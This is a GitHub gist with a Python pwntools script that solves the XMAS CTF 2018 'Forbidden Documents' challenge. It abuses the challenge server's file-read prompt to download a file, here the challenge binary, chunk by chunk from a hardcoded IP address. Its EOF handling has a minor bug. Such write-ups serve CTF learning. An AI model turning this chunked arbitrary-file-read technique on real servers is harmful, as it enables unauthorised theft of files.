Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
A python script used to retrieve the binary executable of CTF challenge "Forbidden Documents" - XMAS CTF 2018
from pwn import *
from sys import argv
import re
def get_chunk(name, size, offset):
try:
p = remote("199.247.6.180", 10004)
payload = name
payload += '\n'
payload += 'y'
payload += '\n'
payload += '{}'.format(size)
payload += '\n'
payload += '{}'.format(offset)
payload += '\n'
p.sendline(payload)
p.recvuntil("Content: ")
data = p.recvall()
# print(data)
# print(len(data))
p.close()
return data.replace("\x0d\x0a", "\x0a")
except Exception as e:
print(e)
return "ERROR"
def main():
if len(argv) != 3:
print("Usage: {} <name_of_file> <size_chunk>".format(sys.argv[0]))
exit(0)
name = argv[1]
size_chunk = argv[2]
offset = 0
data = ""
counter = 0
while counter < 10:
print("Getting {} bytes at offset {}...".format(size_chunk, offset))
exc_counter = 0
while exc_counter < 10:
exc_counter += 1
print("Getting both chunks...")
data1 = get_chunk(name, size_chunk, offset)
data2 = get_chunk(name, size_chunk, offset)
if "ERROR" not in data1 and "ERROR" not in data2:
break
if data1 == data2:
if data1 == '\x00'*len(data1):
counter += 1
print("Counter of zero sections: {}".format(counter))
else:
counter = 0
data += data1
offset += len(data1)
else:
print("[+] Reached EOF")
diffs = [i for i in xrange(len(data1)) if data1[i] != data2[i]]
data += data1[:i]
break
if '/' in name:
name = name[name.rfind('/') + 1:]
f = open("./output/{}".format(name), 'wb')
f.write(data)
f.close()
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.